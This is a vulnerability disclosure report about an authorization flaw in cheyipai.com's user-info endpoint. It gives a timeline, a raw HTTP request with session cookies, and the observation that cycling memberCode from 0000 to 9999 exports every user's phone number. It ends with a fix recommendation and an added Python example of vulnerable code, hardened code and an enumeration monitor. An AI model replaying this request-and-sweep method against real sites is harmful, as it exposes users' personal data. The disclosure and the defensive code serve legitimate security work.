2015-10-04: Details sent to the vendor; awaiting the vendor's handling
2015-10-08: Vendor has confirmed; details are disclosed to the vendor only
2015-10-18: Details disclosed to core white hats and experts in the relevant field
2015-10-28: Details disclosed to ordinary white hats
2015-11-07: Details disclosed to intern white hats
2015-11-22: Details disclosed to the public
RT (as titled)
GET /usermain/GetUserInfo?CurrentSessionId=655376a9-1d4a-4322-a5f7-ae160d0a146b&optStatusCode=D7E3F8AB-1D93-4047-8A13-777164D99A0C&memberCode=US001691&_=1443932473804 HTTP/1.1
Host: www.cheyipai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.cheyipai.com/user/index
Cookie: Hm_lvt_11a0d0462736ffe428c2decbb869ef07=1443931424; Hm_lpvt_11a0d0462736ffe428c2decbb869ef07=1443932398; Hm_lvt_c8752f1ed50be0798e275b8114081c89=1443931424; Hm_lpvt_c8752f1ed50be0798e275b8114081c89=1443932398; _adksh=1443931425481; _adkse=1802636bb006633554ef745b4fe8d1ab; _adksd=direct; _adksb=1443934199521; _adksc=1443931425481; _adksf=%26_u%3D0%26_a%3D0%26_k%3D0%26_s%3D0; _adksa=130025103.218070697.1443931425497.1443931425497.1443931425497; LoginValidCode=DJ5D; OW_RememberMe=per1sh; sid=655376a9-1d4a-4322-a5f7-ae160d0a146b; logininfo=pGM72YxKGoFFwiBYCN3rwMrgKfHC69mEk4Okz7k/qPJ+NZKnsytNkDA/8LBtYQu1yK95tp1t2zlAlrxxRNSKLgWuUh5+xC5FCon+TtkOD29RaNAZC1uKeVr/nZC2gHt6HSzq5ESMib58tK+suAHKSc/qM//+zOjqdFz8QuRGkwSSge9W4xFttwB0WOqNofYRM9r7SOIkZZp0r/cUHqwKbwuO3xaU8BZ6b1eitRvPwKjMIajvyD8/hXXepjSRuphA1r7gAoqWVj+vt2+O4JkSfGJ3F2aaLOIZKNS1Mmfu4YOOjsPfszEj1CO2EujD2d7aWE6eTOL6Q431oYGEfHF7M0ehfgVe+qif6VWt7agpQzRq/hk7Ym/Z0gwe+CTtB/qsDm3oNzESswian5n+hHlHJRfalsEljMPjKX9jJKrZ5ZN3xHqCBga1ANKjXp0xMFnzPg2o4xp8gIGs+HCZv8r2EKt2goeXpV8jT2SAZZV1KYfOb5DU20hjnyjFwFhQqF0bEU8bH57IolKbQIm61zTTDPPmmy6ozRsa64znYID64qAKeElx/mgbVpEX//JSOm8smlYechRxfDUb/qYUC3tg0dmyG6KHjg9IS1Bbi5CXct0rfIL7m4ECMQ==; loginSessionID=655376a9-1d4a-4322-a5f7-ae160d0a146b
X-Forwarded-For: 8.8.8.8
Connection: close
The memberCode parameter of the user-info endpoint is not subject to any authorization check, so a horizontal privilege escalation lets a logged-in user view other users' phone numbers and usernames.
Simply iterating the last four digits of memberCode from 0000 to 9999 would export the phone numbers of every user on the site.
Enforce proper authorization controls against this kind of privilege escalation.
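To make the recommended fix concrete, here is an added example (written for this page, not code from the report, the vendor or the site) contrasting the flawed lookup with one that binds the record to the authenticated session, plus a small monitor that flags the many-distinct-memberCodes access pattern a sweep would leave in the logs. The handler names, the Session model, the in-memory user store and the sample records are all assumptions constructed for the example.

```python
from dataclasses import dataclass
from collections import defaultdict, deque
import time

# Constructed sample data standing in for the site's user store (not real records).
USERS = {
    "US001691": {"memberCode": "US001691", "username": "alice", "phone": "138-0000-0001"},
    "US001692": {"memberCode": "US001692", "username": "bob",   "phone": "138-0000-0002"},
}


@dataclass
class Session:
    session_id: str
    member_code: str  # the member this session was authenticated as (assumed model)


class Forbidden(Exception):
    pass


def get_user_info_vulnerable(session, member_code):
    """Before: returns whatever record the client-supplied memberCode names.
    The session is only checked for existence, never tied to the record
    being read, which is the horizontal privilege escalation in the report."""
    if session is None:
        raise Forbidden("not logged in")
    return USERS.get(member_code)


def get_user_info(session, member_code):
    """After: the record is selected by the identity bound to the session on
    the server side; the client-supplied memberCode is accepted only when it
    matches that identity, so one user can never read another user's record."""
    if session is None:
        raise Forbidden("not logged in")
    if member_code != session.member_code:
        raise Forbidden("memberCode does not belong to this session")
    return USERS.get(session.member_code)


class EnumerationMonitor:
    """Flags a session that requests many distinct memberCodes within a short
    window, the access pattern a sequential 0000-9999 sweep produces. This is a
    detection aid for the application log, not a substitute for the check above."""

    def __init__(self, max_distinct=20, window_seconds=60):
        self.max_distinct = max_distinct
        self.window = window_seconds
        self.seen = defaultdict(deque)  # session_id -> deque of (timestamp, memberCode)

    def record(self, session_id, member_code, now=None):
        """Record one request; return True once the session exceeds the threshold."""
        now = time.time() if now is None else now
        q = self.seen[session_id]
        q.append((now, member_code))
        # Drop entries that have aged out of the window.
        while q and now - q[0][0] > self.window:
            q.popleft()
        distinct = {code for _, code in q}
        return len(distinct) > self.max_distinct
```

The vulnerable version answers any memberCode for any logged-in session; the hardened version raises Forbidden on a mismatch and ignores the untrusted parameter when choosing the row. The monitor is tuned by max_distinct and window_seconds; a legitimate user views their own record, so even a low threshold on distinct codes per session rarely misfires.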
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-10-08 15:09
Thanks for the submission
None for now